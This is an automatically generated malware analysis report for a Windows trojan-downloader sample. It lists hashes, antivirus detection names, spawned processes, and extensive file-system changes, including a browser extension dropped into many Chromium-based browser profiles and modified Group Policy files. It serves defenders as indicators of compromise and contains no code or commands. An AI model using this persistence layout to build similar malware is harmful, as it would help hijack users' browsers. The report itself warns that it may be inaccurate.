Trojan.GenericKD.1828389_065339e838

by malwarelabrobot on November 10th, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Genome.ihvy (Kaspersky), Trojan.GenericKD.1828389 (B) (Emsisoft), Trojan.GenericKD.1828389 (AdAware), Backdoor.Win32.PcClient.FD, Trojan-Downloader.Win32.Moure.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 065339e8387b04c2368bd0d97be93c50
SHA1: 2c7ecfc0980e7e714a5e42c74823f6b22912284c
SHA256: 8740614375fe89e670b62a1ae5231bcca902fbeb142972184bfdafe1a17d36cf
SSDeep: 6144:grnqcYK8nNZOnUJE8UdYCc63jlfLLMy9INUCcS4Epj:grqRfXINcMjNLMpytSpd
Size: 384512 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company: AirInstaller Inc.
Created at: 2014-08-27 15:42:33
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1904
qeO052T9N.exe:1356
rundll32.exe:892
rundll32.exe:1216
regsvr32.exe:1944
4t0K2gExXKV.exe:496
gzfJ2GIHr9X.exe:1288

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\4t0K2gExXKV.exe (650324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qeO052T9N.exe (352986 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\qeO052T9N.exe (0 bytes)

The process qeO052T9N.exe:1356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\install.rdf (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.x64.dll (6338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\lsdb.js (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected] (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\content\bg.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.tlb (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.exe (3863 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.dll (3837 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\manifest.json (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\chrome.manifest (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\eKK1Ekpn.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\bootstrap.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.dat (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\install.rdf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.x64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\lsdb.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\content.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\content\bg.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.tlb (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\content (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\background.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\chrome.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\eKK1Ekpn.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\bootstrap.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.dat (0 bytes)

The process 4t0K2gExXKV.exe:496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
%Program Files%\Supporter\Supporter.dll (272917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHIRSTUV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0RRGIZX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BYIBPPYK\desktop.ini (67 bytes)
%Program Files%\Supporter\SupporterSvc.dll (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZFJLCPJB\desktop.ini (67 bytes)

The process gzfJ2GIHr9X.exe:1288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.dat (260 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.dat (260 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\All Users\Application Data\f362fc35c4a3dbfb\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}.20141109042007 (186 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%System%\GroupPolicy\Machine\Registry.pol (264 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe (26944 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.tlb (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.x64.dll (30600 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%System%\GroupPolicy\gpt.ini (315 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
